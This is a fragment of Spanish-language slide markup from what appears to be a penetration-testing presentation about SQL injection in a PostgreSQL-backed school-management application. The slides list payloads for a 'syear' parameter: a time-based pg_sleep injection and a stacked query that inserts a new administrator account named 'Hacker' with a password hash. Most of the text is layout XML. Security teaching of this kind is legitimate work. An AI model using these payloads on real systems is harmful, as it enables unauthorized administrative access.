                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t>Al mismo tiempo se levanta la base de datos PostgreSQL</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t>Se realiza el login y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t>autenticación</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t> en la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t>aplicación</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t>La aplicación ya estaría corriendo “Normalmente”</a:t>
            </a:r>
            <a:endParaRPr sz="16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163625" y="1017725"/>
            <a:ext cx="2326276" cy="1698350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:schemeClr val="lt2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="84" name="Google Shape;84;p17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="48092" l="30814" r="28968" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2617125" y="1017724"/>
            <a:ext cx="2326276" cy="1698350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:schemeClr val="lt2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="85" name="Google Shape;85;p17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="11981" l="0" r="0" t="9807"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="526325" y="2894275"/>
            <a:ext cx="3993558" cy="1758125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:schemeClr val="lt2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>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15150" y="471975"/>
            <a:ext cx="935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r>
              <a:rPr lang="es"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>de vulnerabilidades - Penetration test - SQLmap </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="91" name="Google Shape;91;p18"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="47376" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="987775" y="1102701"/>
            <a:ext cx="6878450" cy="3212650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92" name="Google Shape;92;p18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="987775" y="2644125"/>
            <a:ext cx="4958400" cy="34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68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Desarrollo de la vulnerabilidad </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="98" name="Google Shape;98;p19"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1947450" y="741550"/>
            <a:ext cx="5076045" cy="4097149"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99" name="Google Shape;99;p19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2443825" y="741550"/>
            <a:ext cx="3313800" cy="101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2927100" y="3980300"/>
            <a:ext cx="2980200" cy="43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4388450" y="4469125"/>
            <a:ext cx="2508300" cy="369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058150" y="230588"/>
            <a:ext cx="7027700" cy="4682325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Google Shape;107;p20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2604900" y="2465875"/>
            <a:ext cx="1697400" cy="24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60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Posibles Payloads a enviar</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113" name="Google Shape;113;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="222150" y="1412300"/>
            <a:ext cx="8699700" cy="572700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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520" u="sng"/>
              <a:t>SQLi - Time Based:</a:t>
            </a:r>
            <a:endParaRPr sz="1520" u="sng"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1520"/>
              <a:t>sidefunc=update syear=111' OR (SELECT COUNT (pg_sleep(5)))=1--</a:t>
            </a:r>
            <a:endParaRPr sz="1520"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="Google Shape;114;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="222150" y="2320825"/>
            <a:ext cx="8699700" cy="1819800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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520" u="sng"/>
              <a:t>SQLi - POST/SELECT:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es" sz="1520"/>
            </a:br>
            <a:r>
              <a:rPr lang="es" sz="1520"/>
              <a:t>sidefunc=update syear=111';</a:t>
            </a:r>
            <a:endParaRPr sz="1520"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1520"/>
              <a:t>INSERT INTO STAFF (SYEAR,STAFF_ID,"first_name","last_name","username","password","profile","profile_id") values('2022','4','Hack',Er','Hacker','$6$6c0b492b4c64bc9e$sgHUN45tj7jyn72f94o4w/7rShoNgv9YpyEs3AqAFy3n4q1s89csSH6/cfLsg1XYenragKwVfT0LvkMoNO63I1','admin','1');</a:t>
            </a:r>
            <a:endParaRPr sz="1520"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1520"/>
              <a:t>SELECT MARKING_PERIOD_ID FROM SCHOOL_MARKING_PERIODS WHERE MP='QTR </a:t>
            </a:r>
            <a:endParaRPr sz="1520"/>
          </a:p>
        </p:txBody>
      </p:sp>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